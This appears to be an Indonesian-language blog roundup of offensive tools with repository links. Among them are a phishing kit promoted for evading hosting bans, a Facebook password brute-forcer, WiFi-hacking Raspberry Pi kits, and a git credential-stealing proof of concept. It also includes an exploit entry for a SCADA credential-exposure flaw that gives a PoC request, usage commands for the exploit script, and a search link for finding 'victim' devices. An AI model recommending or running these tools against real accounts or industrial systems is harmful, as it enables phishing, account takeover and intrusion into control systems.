SocialFish - Ultimate phishing tool with Ngrok integrated

SocialFish adalah tool untuk phising yang terintregasi langsung oleh ngrok sehingga lebih efektif daripada menggunakan hosting yang selalu membanned laman phising

https://github.com/UndeadSec/SocialFish

FruityWifi v2.4 - Wireless Network Auditing Tool

FruityWifi v2.4 adalah tool Raspberry Pi untuk Hacking WiFi dan Tool ini juga bisa di install di Debian, Kali Linux, Kali Linux ARM (Raspberry Pi), Raspbian (Raspberry Pi), Pwnpi (Raspberry Pi), Bugtraq

more info
https://github.com/xtr4nge/FruityWifi
http://www.fruitywifi.com/index_eng.html

WarBerryPi - Tactical Exploitation

Tool untuk mengubah Raspberry Pi menjadi hacking tools

More info
https://github.com/secgroundzero/warberry

WFacebook : Facebook Password Cracker

WFacebook tool untuk cracking password facebook menggunakan metode bruteforce

https://github.com/s1kr10s/WFacebook

Samurai Email Discovery - SED is a email discovery framework that grabs emails via google dork, company name, or domain name.

Samurai Email Discovery adalah tool  untuk pencarian email melalui google dorking.

More info
https://github.com/0x3curity/Samurai

TheDoc : simple but very useful SQLMAP automator with built in admin finder, hash cracker(using hashcat) and more!

Tool yang sangat sederhana untuk otomatisasi proses hacking dengan metode SQL injection dengan SQLMap, proses pencarian halaman login dan pemecahan hash dan lainnya.

info lebih lanjut
https://github.com/0x3curity/TheDoc

CenoCipher : Crypto Communication Tool

CenoCipher adalah tool enkripsi untuk komunikasi antar jaringan internet sehingga privasi terjaga dan aman dari kebocoran informasi

more info
https://gitlab.com/cenocipher/cenocipher

netpwn : Tool made to automate tasks of pentesting.

tool otomatisasi pentest untuk  mempermudah proses scanning dan pentesting

more info
https://github.com/3XPL017/netpwn

Gitbackdorizer

Gitbackdorizer : adalah sebuah bukti konsep yang menggunakan kurangnya perhatian pengguna untuk mencuri kredensial akses ke git


More info
https://github.com/UnkL4b/GitBackdorizer
https://www.youtube.com/watch?v=ka8uJqaDYOs

Exploit: SCADAS "BAS920 & ISC2000": Credentials Exposed

[*] Exploit Title: "SCADAS "BAS920 & ISC2000"; Credentials Exposed”
[*] CVE: CVE-2017-17974
[*] Date: 29/12/2017
[*] Exploit Author: Fernandez Ezequiel ( @capitan_alfa ) && Bertin Jose ( @bertinjoseb )
[*] Vendor: BA System
[*] devices(tested): BAS920 & ISC2000

PoC:
curl http://<host>/isc/get_sid_js.aspx
tool
usr@pwn:~$ git clone https://github.com/ezelf/baCK_system.git
usr@pwn:~$ cd baCK_system
usage
usr@pwn:~/$ python plinplanplum.py --help
python plinplanplum.py --help
usage: plinplanplum.py [-h] [-v] --host HOST [--port PORT]
[+] Obtaining all credentials for the Supervisor/Administrator account
optional arguments:
-h, --help show this help message and exit
-v, --version show program's version number and exit
--host HOST Host
--port PORT Port
[+] Demo: python plinplanplum.py --host 192.168.1.101 -p 81
Search Devices vicitms:
https://www.zoomeye.org/searchResult?q=HTTPserv&t=host
https://github.com/ezelf/baCK_system

From : https://www.facebook.com/Ksecureteam/

Fireshodanmap: peta real - time yang terintegrasi firebase, Google Maps dan shodan

Fireshodanmap adalah peta real time yang terintegrasi firebase dan shodan. Melakukan pencarian menggunakan shodan mencari perangkat yang rentan dan ditampilkan pada peta untuk analisis anda. Semua data diperbarui di firebase adalah real time.


More Info :





https://github.com/Warflop/FireShodanMap